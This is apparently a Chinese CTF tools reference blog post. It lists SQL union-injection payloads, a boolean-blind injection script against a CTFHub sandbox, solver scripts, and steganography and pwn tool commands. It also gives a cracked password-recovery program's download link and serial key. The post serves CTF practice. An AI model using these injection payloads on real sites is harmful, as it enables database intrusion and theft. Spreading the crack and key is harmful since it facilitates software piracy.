[持续更新] CTFtools

WEB 

sqlmap

[持续更新] CTFtools
123313 union select 1,2#
123313 union select 1,database()#
123313 union select 1,group_concat(table_name) from information_schema.tables where table_schema="sqli"#
123313 union select 1,group_concat(column_name) from information_schema.columns where table_name="flag"#
123313 union select 1,flag from sqli.flag#
普通手工注入

 

[持续更新] CTFtools报错注入

 

[持续更新] CTFtools
import string
import requests

name = ''
strall = string.ascii_lowercase + string.digits + string.punctuation
# for k in range(1,15):
for j in range(1,50):
    for i in strall:
        # 查数据库名
        # datas = "if(substr(database(),%d,1)='%s',1,(select table_name from information_schema.tables))"% (j,i)
        # 查表名
        # datas = "if(substr((select table_name from information_schema.tables where table_schema='sqli' limit %d,1),%d,1) = '%s',1,(select table_name from information_schema.tables))" %(k,j,i)
        # 查列名
        # datas = "if(substr((select column_name from information_schema.columns where table_name='zqjsjpvifa' and table_schema='sqli'),%d,1) = '%s',1,(select table_name from information_schema.tables))" %(j,i)
        # 查内容
        # datas = "if(substr((select wdiqllcsoi from sqli.zqjsjpvifa),%d,1) = '%s',1,(select table_name from information_schema.tables))" %(j,i)
        re = requests.get('http://challenge-0c37e62039a49553.sandbox.ctfhub.com:10080/?id='+datas)
        html = re.text
        # print(html)
        if "ctfhub" in html:
            name += i
            print(name)
            break
布尔盲注

 

[持续更新] CTFtools时间盲注

 

Fuzz字典 https://github.com/TheKingOfDuck/fuzzDicts

Git泄露

https://github.com/BugScanTeam/GitHack

https://github.com/WangWen-Albert/JGitHack

https://github.com/gakki429/Git_Extract

 

杂项

http://www.efittech.com/hxdec.html  识别汉信码

angr fuzz  angr安装

[持续更新] CTFtools
1.安装依赖(基本开发环境):
sudo apt-get install python-dev libffi-dev build-essential virtualenvwrapper
 
2.virtualenvwrapper初始化:
首先设置一个环境变量WORKON_HOME
export WORKON_HOME=$HOME/Python-workhome
这里的$HOME/Python-workhome就是准备放置虚拟环境的地址
 
启动virtualenvwrapper.sh脚本
source /usr/share/virtualenvwrapper/virtualenvwrapper.sh
注意:可以使用whereis virtualenvwrapper.sh命令查看脚本的位置
 
3.在python3的环境下安装angr:
mkvirtualenv --python=$(which python3) angr && pip install angr
 
4.安装好后在其他的命令在一个新的终端窗口直接运行workon,并没有创建的angr虚拟环境,需要执行下面两条命令才可以:
export WORKON_HOME=$HOME/Python-workhome
source /usr/share/virtualenvwrapper/virtualenvwrapper.sh
可以写一个shell脚本包含两条命令,以后直接运行shell脚本即可。

virtualenvwrapper操作命令: 
 
创建环境 
mkvirtualenv env1  
环境创建之后,会自动进入该目录,并激活该环境。

切换或进入环境 
workon env1 

列出已有环境 
workon 

退出环境 
deactivate 

删除环境 
rmvirtualenv
angr安装 [持续更新] CTFtools
1
import angr

p = angr.Project('martricks',auto_load_libs=False)
state = p.factory.entry_state()
simg = p.factory.simgr(state)
simg.explore(find=0x400A84,avoid=0x400A90)
simg.found[0].posix.dumps(0)

2
import angr

p = angr.Project("martricks")
simgr = p.factory.simulation_manager(p.factory.full_init_state())
simgr.explore(find=0x400A84, avoid=0x400A90)
simgr.found[0].posix.dumps(0)
fuzz代码

ASCII 在线转换器

生成红黑树

https://gchq.github.io/CyberChef/  编码转换工具

rot13

因数分解  

DAPR 密码破解

[持续更新] CTFtools
dvanced archive password recovery pro v4.54破解版
下载:https://www.lanzous.com/i240fbc
输入注册码:ARCHPRP-GSVMT-66892-GKVMB-52992
DAPR

Rabin加密 

[持续更新] CTFtools
代码段分析代码,明文使用了Rabin加密

m = "109930883401687215730636522935643539707"
e = 2
n = 0x6FBD096744B2B34B423D70C8FB19B541
assert(int(m.encode('hex'), 16) < n)
c = pow(int(m.encode('hex'), 16),e,n)
print c
#109930883401687215730636522935643539707

通过资料了解加密方式后,编写解密脚本,将n分解出p和q,解密脚本如下:

import gmpy2

c=109930883401687215730636522935643539707
n=0x6fbd096744b2b34b423d70c8fb19b541
p=10848126018911527523
q=13691382465774455051
#获得c^(1/2)modp,q的解
r=pow(c,(p+1)/4,p)
s=pow(c,(q+1)/4,q)
#使用中国定理组合解
pni=int(gmpy2.invert(p,q))
qni=int(gmpy2.invert(q,p))
a=(s*p*pni+r*q*qni)%n
a1=n-a
b=(s*p*pni-r*q*qni)%n
b1=n-b
print (['0',''][len(hex(a))%2]+hex(a)[2:-1]).decode("hex")
print (['0',''][len(hex(a))%2]+hex(a1)[2:-1]).decode("hex")
print (['0',''][len(hex(a))%2]+hex(b)[2:-1]).decode("hex")
print (['0',''][len(hex(a))%2]+hex(b1)[2:-1]).decode("hex")
Rabin

JSFuck  ()+[]!

Brainfuck/Ook

wolfram  用于各类密码算法分析的在线工具

quipqiup  自动密码求解器

栅栏加密  https://www.qqxiuzi.cn/bianma/zhalanmima.php

CTF在线工具   http://ctf.ssleye.com/

 

 

隐写

binwalk -e  用于搜索给定二进制镜像文件以获取嵌入的文件和代码的工具

foremost  用来文件还原分离

Steghide  将文件隐藏到图片或音频中的工具

[持续更新] CTFtools
安装
apt-get install steghide

隐藏文件
steghide embed -cf [图片文件载体] -ef [待隐藏文件]
steghide embed -cf 1.jpg -ef 1.txt

查看图片中嵌入的文件信息
steghide info 1.jpg

提取图片中隐藏的文件
steghide extract -sf 1.jpg
steghide

LSB-Steganography  LSB隐写  https://github.com/RobinDavid/LSB-Steganography

[持续更新] CTFtools
Usage
LSBSteg.py

Usage:
  LSBSteg.py encode -i <input> -o <output> -f <file>
  LSBSteg.py decode -i <input> -o <output>

Options:
  -h, --help                Show this help
  --version                 Show the version
  -f,--file=<file>          File to hide
  -i,--in=<input>           Input image (carrier)
  -o,--out=<output>         Output image (or extracted file)
LSB-Steganography

stegsolve  图片隐写查看器   http://www.caesum.com/handbook/Stegsolve.jar

snow html隐写  http://fog.misty.com/perry/ccs/snow/snow/snow.html

[持续更新] CTFtools
snow 是一款在html嵌入隐写信息的软件,
它的原理是通过在文本文件的末尾嵌入空格和制表位的方式嵌入隐藏信息,
不同空格与制表位的组合代表不同的嵌入信息。
snow

ezgif  GIF 在线分帧工具

Audacity  一款免费的音频处理软件,常用于音频隐写

MP3Stego  音频隐写工具

 

逆向

QEMU full-system

IDA Pro 一款功能丰富的跨平台多处理器反汇编程序和调试器

OD

Ghidra

jadx-gui  Android/Java反编译

JEB  Android逆向工具,可以反编译和调试二进制代码

jd-gui  将 class 文件反编译为 Java 源代码

Apktool  主要用于逆向 apk 文件。它可以将资源解码,并在修改后可以重新构建它们。

dnSpy  一款.NET程序调试器和反编译器 

 

PWN

pwntools  PWN工具集  pip install pwntools

checksec  检查保护机制   apt-get install checksec

ROPgadget

LibcSearcher  泄露libc版本

[持续更新] CTFtools
安装
git clone https://github.com/lieanu/LibcSearcher.git
cd LibcSearcher
python setup.py develop
LibcSearcher

gdb linux程序动态调试  apt-get install gdb

gdb-peda

[持续更新] CTFtools
git clone https://github.com/longld/peda.git ~/peda
echo "source ~/peda/peda.py" >> ~/.gdbinit 
gdb-peda安装

objdump  快速查看二进制文件信息的工具

 

 

 

上一篇:Angr文档翻译-Loading


下一篇:angr进阶(6)绕过反调试